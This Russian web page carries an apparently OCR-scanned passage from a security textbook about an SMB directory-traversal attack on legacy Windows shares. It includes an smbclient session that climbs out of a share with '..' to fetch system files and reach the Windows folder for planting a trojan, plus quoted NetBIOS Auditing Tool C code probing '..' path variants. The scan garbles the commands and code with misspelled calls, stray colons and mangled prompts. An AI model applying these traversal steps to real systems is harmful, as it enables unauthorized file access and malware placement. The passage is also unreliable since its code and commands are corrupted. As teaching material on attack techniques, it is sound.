Главная Случайная страница Контакты | Мы поможем в написании вашей работы! | ||
|
Сервер якобы не поддерживает зашифрованные пароли. Естественно, роль
Сервера здесь выполняет ложный сервер злоумышленника (см. главу 3).
Из-за поддержки устаревших с точки зрения безопасности сетевых решений SMB
Может быть подвержен атаке на получение доступа ко всему диску, если у
Злоумышленника есть права только на его часть (каталог). Для этого
взломщику достаточно указать имя каталога через ".." $snibclient
\\\\VICTIM\\SOME_DIR -n TRUSTME -m LANMAN2 -U HACKER -1 194.94.94.94
smb: \" dir suit): \" cd..
smb: \..\" dir
smb: \..\"cd \..\..
smb:\..\..\"dir
smb: \..\..\" get config.sys -
smb; \..\..\" cd windows
smb: \..\..\windows\"
Далее злоумышленник может поместить в системный каталог Windows, например,
"троянского" коня. Первоначальная реакция Microsoft: "Samba -это
неправильный клиент, и он не должен быть использован".
Аналогичные попытки делает и NAT (NetBIOS Auditing Tool) -
Распространенное средство анализа безопасности для Windows-сетей. Вот
фрагмент его исходного текста:
strcpy(cur_dir, "..\\*.*"):
Do_dir (inbuf, outbuf, cur_dir, fattr, cfflp_stash, False);
tested_stash = 0:
strcpy(cur_dir, "\\..\\*.*");
do_dir (inbuf, outbuf, cur_dir, fattr, cmp_stash, False):
tested_stash = 0;
strepy (cur_dir, "...\\*.*"),
Do_dir (inbuf, outbuf, cur_dir, fattr, cmp_stash, False);
tested_stash = 0;
strcpy (cur_dir, ".\\...\\*. *");
Дата публикования: 2014-11-04; Прочитано: 303 | Нарушение авторского права страницы | Мы поможем в написании вашей работы!